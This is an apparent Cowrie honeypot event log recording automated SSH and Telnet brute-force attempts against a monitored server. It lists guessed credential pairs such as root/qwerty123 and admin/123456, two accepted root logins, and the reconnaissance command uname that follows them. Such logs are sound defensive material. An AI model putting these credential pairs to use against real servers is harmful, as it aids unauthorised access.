{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:31:59.462196Z","src_ip":"212.227.125.160","session":"5e9cae769d37"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:31:59.463289Z","src_ip":"212.227.125.160","session":"5e9cae769d37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59006,"dst_ip":"1.2.3.4","dst_port":22,"session":"89c34bd84cf6","protocol":"ssh","message":"New connection: 212.227.235.229:59006 (1.2.3.4:22) [session: 89c34bd84cf6]","sensor":"my-vps","timestamp":"2025-08-28T05:32:06.897597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:32:06.919977Z","src_ip":"212.227.235.229","session":"89c34bd84cf6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:32:07.043132Z","src_ip":"212.227.235.229","session":"89c34bd84cf6"}
{"eventid":"cowrie.session.closed","duration":33.345680952072144,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:07.453128Z","src_ip":"8.222.212.69","session":"dfa8e43bc798"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:32:07.623825Z","src_ip":"212.227.235.229","session":"89c34bd84cf6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:32:07.986626Z","src_ip":"212.227.235.229","session":"89c34bd84cf6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:32:07.987316Z","src_ip":"212.227.235.229","session":"89c34bd84cf6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:08.133632Z","src_ip":"212.227.235.229","session":"89c34bd84cf6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:08.135102Z","src_ip":"212.227.235.229","session":"89c34bd84cf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50842,"dst_ip":"1.2.3.4","dst_port":22,"session":"d19ed6800d83","protocol":"ssh","message":"New connection: 212.227.125.160:50842 (1.2.3.4:22) [session: d19ed6800d83]","sensor":"my-vps","timestamp":"2025-08-28T05:32:13.419972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:32:13.443992Z","src_ip":"212.227.125.160","session":"d19ed6800d83"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:32:13.536391Z","src_ip":"212.227.125.160","session":"d19ed6800d83"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-28T05:32:13.946022Z","src_ip":"212.227.125.160","session":"d19ed6800d83"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:15.063188Z","src_ip":"212.227.125.160","session":"d19ed6800d83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58184,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4c16b7dc0dc","protocol":"ssh","message":"New connection: 212.227.235.229:58184 (1.2.3.4:22) [session: b4c16b7dc0dc]","sensor":"my-vps","timestamp":"2025-08-28T05:32:20.446024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:32:20.447120Z","src_ip":"212.227.235.229","session":"b4c16b7dc0dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:32:20.591438Z","src_ip":"212.227.235.229","session":"b4c16b7dc0dc"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-28T05:32:21.026547Z","src_ip":"212.227.235.229","session":"b4c16b7dc0dc"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:22.173041Z","src_ip":"212.227.235.229","session":"b4c16b7dc0dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56974,"dst_ip":"1.2.3.4","dst_port":22,"session":"effb001d9f18","protocol":"ssh","message":"New connection: 212.227.125.160:56974 (1.2.3.4:22) [session: effb001d9f18]","sensor":"my-vps","timestamp":"2025-08-28T05:32:28.204734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:32:28.206175Z","src_ip":"212.227.125.160","session":"effb001d9f18"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:32:28.328338Z","src_ip":"212.227.125.160","session":"effb001d9f18"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:32:28.723981Z","src_ip":"212.227.125.160","session":"effb001d9f18"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:29.829964Z","src_ip":"212.227.125.160","session":"effb001d9f18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33226,"dst_ip":"1.2.3.4","dst_port":22,"session":"e42033e93c38","protocol":"ssh","message":"New connection: 212.227.235.229:33226 (1.2.3.4:22) [session: e42033e93c38]","sensor":"my-vps","timestamp":"2025-08-28T05:32:38.576408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:32:38.577374Z","src_ip":"212.227.235.229","session":"e42033e93c38"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:32:38.721730Z","src_ip":"212.227.235.229","session":"e42033e93c38"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:32:39.157915Z","src_ip":"212.227.235.229","session":"e42033e93c38"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:40.305056Z","src_ip":"212.227.235.229","session":"e42033e93c38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54192,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d97c94bdd5b","protocol":"ssh","message":"New connection: 212.227.125.160:54192 (1.2.3.4:22) [session: 0d97c94bdd5b]","sensor":"my-vps","timestamp":"2025-08-28T05:32:43.220657Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:32:43.267322Z","src_ip":"212.227.125.160","session":"0d97c94bdd5b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:32:43.341478Z","src_ip":"212.227.125.160","session":"0d97c94bdd5b"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":56790,"dst_ip":"1.2.3.4","dst_port":23,"session":"aeac8d62cef5","protocol":"telnet","message":"New connection: 8.222.212.69:56790 (1.2.3.4:23) [session: aeac8d62cef5]","sensor":"my-vps","timestamp":"2025-08-28T05:32:43.527549Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:32:43.747526Z","src_ip":"212.227.125.160","session":"0d97c94bdd5b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:44.855617Z","src_ip":"212.227.125.160","session":"0d97c94bdd5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41452,"dst_ip":"1.2.3.4","dst_port":22,"session":"4434561cb9ab","protocol":"ssh","message":"New connection: 212.227.235.229:41452 (1.2.3.4:22) [session: 4434561cb9ab]","sensor":"my-vps","timestamp":"2025-08-28T05:32:50.500803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:32:50.501791Z","src_ip":"212.227.235.229","session":"4434561cb9ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:32:50.647092Z","src_ip":"212.227.235.229","session":"4434561cb9ab"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:32:51.085780Z","src_ip":"212.227.235.229","session":"4434561cb9ab"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:52.232483Z","src_ip":"212.227.235.229","session":"4434561cb9ab"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:53.661372Z","src_ip":"14.103.126.73","session":"f554bd5f3de8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35816,"dst_ip":"1.2.3.4","dst_port":22,"session":"3494fb183291","protocol":"ssh","message":"New connection: 212.227.125.160:35816 (1.2.3.4:22) [session: 3494fb183291]","sensor":"my-vps","timestamp":"2025-08-28T05:32:58.458812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:32:58.491824Z","src_ip":"212.227.125.160","session":"3494fb183291"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:32:58.565696Z","src_ip":"212.227.125.160","session":"3494fb183291"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:32:58.984061Z","src_ip":"212.227.125.160","session":"3494fb183291"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:32:59.214306Z","src_ip":"212.227.125.160","session":"3494fb183291"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:32:59.215110Z","src_ip":"212.227.125.160","session":"3494fb183291"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:59.321591Z","src_ip":"212.227.125.160","session":"3494fb183291"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:32:59.322626Z","src_ip":"212.227.125.160","session":"3494fb183291"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40258,"dst_ip":"1.2.3.4","dst_port":22,"session":"373831255d00","protocol":"ssh","message":"New connection: 212.227.235.229:40258 (1.2.3.4:22) [session: 373831255d00]","sensor":"my-vps","timestamp":"2025-08-28T05:33:05.558782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:33:05.559946Z","src_ip":"212.227.235.229","session":"373831255d00"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 